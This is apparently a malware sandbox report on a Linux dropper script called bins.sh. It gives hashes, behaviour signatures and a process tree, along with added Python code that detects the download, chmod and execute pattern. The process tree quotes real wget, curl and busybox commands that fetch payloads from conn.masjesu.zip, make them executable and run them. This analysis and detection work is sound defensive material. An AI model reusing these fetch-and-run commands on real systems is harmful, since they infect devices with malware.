Analysis

  • max time kernel
    149s
  • max time network
    13s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    04-11-2024 10:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    facd8d5b4de07f8d4d3e00bf507864de

  • SHA1

    6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5

  • SHA256

    00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad

  • SHA512

    9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721

  • SSDEEP

    192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 2 IoCs

    Reads CPU information (e.g. /proc/cpuinfo) that may indicate whether the system is a virtual machine or sandbox.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops the files it needs into the world-writable /tmp directory, which is present on practically every Linux system and rarely mounted noexec on embedded devices.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:650
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:659
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:661
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:667
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:683
        • /bin/chmod
          chmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • File and Directory Permissions Modification
          PID:685
        • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          ./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • Executes dropped EXE
          • System Network Configuration Discovery
          PID:686
        • /bin/rm
          rm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj
          2⤵
          • System Network Configuration Discovery
          PID:688
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • System Network Configuration Discovery
          PID:689
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:691
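The process tree above is the classic bins.sh dropper loop: fetch one architecture-specific payload with whichever downloader happens to exist on the device (wget, curl, or the busybox wget applet), chmod 777 it, execute it, delete it, then move on to the next URL. The detector below is added here as an illustration and is not part of the sandbox report; it replays a constructed stream of execve-style events that mirror the tree above (PIDs and command lines copied from the report, the event format itself is an assumption) and flags any file under a temp directory that is downloaded, made executable and then run. The Event and Chain classes, the helper names and the sample events are all assumptions made for this example.

```python
"""
Added example (not from the sandbox report): flag the download -> chmod ->
execute -> delete dropper chain in a stream of exec events.

The Event format and SAMPLE_EVENTS are constructed for this example; the
commands and PIDs mirror the process tree in the report above.
"""
import os
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlparse

TMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl"}  # busybox applets are unwrapped below


@dataclass
class Event:
    pid: int
    ppid: int
    cwd: str
    cmdline: str


@dataclass
class Chain:
    path: str
    urls: set = field(default_factory=set)
    stages: list = field(default_factory=list)  # ordered, consecutive dups removed

    @property
    def complete(self) -> bool:
        """A dropper chain: downloaded, made executable, then executed."""
        s = self.stages
        return ("download" in s and "chmod" in s and "exec" in s
                and s.index("download") < s.index("exec"))


# Constructed events mirroring the report's process tree (assumed format).
SAMPLE_EVENTS = [
    Event(650, 1, "/tmp", "/tmp/bins.sh"),
    Event(659, 650, "/tmp", "/bin/rm bins.sh"),
    Event(661, 650, "/tmp", "wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(667, 650, "/tmp", "curl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(683, 650, "/tmp", "/bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(685, 650, "/tmp", "chmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(686, 650, "/tmp", "./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(688, 650, "/tmp", "rm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj"),
    Event(689, 650, "/tmp", "wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d"),
    Event(691, 650, "/tmp", "curl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d"),
]


def _resolve(cwd: str, path: str) -> str:
    """Turn a relative path (as typed by the dropper) into an absolute one."""
    return os.path.normpath(path if path.startswith("/") else os.path.join(cwd, path))


def _grants_exec(mode: str) -> bool:
    """True if a chmod mode string sets any execute bit (777, 755, +x ...)."""
    if mode.isdigit():
        return bool(int(mode, 8) & 0o111)
    return "x" in mode


def classify(ev: Event):
    """Return (stage, absolute_path, url_or_None) for one event, else None."""
    argv = shlex.split(ev.cmdline)
    if not argv:
        return None
    tool = os.path.basename(argv[0])
    if tool == "busybox" and len(argv) > 1:      # "/bin/busybox wget URL"
        argv, tool = argv[1:], argv[1]
    args = [a for a in argv[1:] if not a.startswith("-")]  # drop flags like -O
    if tool in DOWNLOADERS and args:
        url = args[-1]                              # wget/curl -O save as URL basename
        return ("download", _resolve(ev.cwd, os.path.basename(urlparse(url).path)), url)
    if tool == "chmod" and len(args) >= 2 and _grants_exec(args[0]):
        return ("chmod", _resolve(ev.cwd, args[-1]), None)
    if tool == "rm" and args:
        return ("delete", _resolve(ev.cwd, args[-1]), None)
    # Only path-invoked binaries (./x, /tmp/x) are resolved against cwd; bare
    # names come from PATH and are not temp-directory executions.
    if "/" in argv[0]:
        exe = _resolve(ev.cwd, argv[0])
        if exe.startswith(TMP_PREFIXES):
            return ("exec", exe, None)
    return None


def find_chains(events):
    """Group stages per target file, preserving the order they were seen."""
    chains = {}
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        stage, path, url = hit
        chain = chains.setdefault(path, Chain(path))
        if url:
            chain.urls.add(url)
        if not chain.stages or chain.stages[-1] != stage:  # wget+curl+busybox = one download stage
            chain.stages.append(stage)
    return chains


def dropper_findings(events):
    """Only the chains that went all the way to execution."""
    return {p: c for p, c in find_chains(events).items() if c.complete}


def network_iocs(events):
    """Distinct download hosts, for blocklists."""
    return sorted({urlparse(u).hostname for c in find_chains(events).values() for u in c.urls})


if __name__ == "__main__":
    for path, chain in find_chains(SAMPLE_EVENTS).items():
        print(f"{'DROPPER' if chain.complete else 'partial'} {path}: {' -> '.join(chain.stages)}")
    print("hosts:", network_iocs(SAMPLE_EVENTS))
```

Note the two failure modes the sample exercises: bins.sh itself only shows exec and delete (it was written by something outside the captured tree, so there is no download stage to pair with), and the second payload shows download only because the report was cut off before its chmod and exec; a detector that fires only on a complete chain stays quiet on both, while the first payload produces a finding. Consecutive wget, curl and busybox wget attempts collapse into one download stage, which is the right grouping for this dropper family since it tries every downloader it knows for the same URL.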

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj

        Filesize

        98KB

        MD5

        5141342d0df8699fa32a6b066a0c592e

        SHA1

        8157673225bd5182f16215e2aa823a25ca2d4fbc

        SHA256

        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

        SHA512

        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801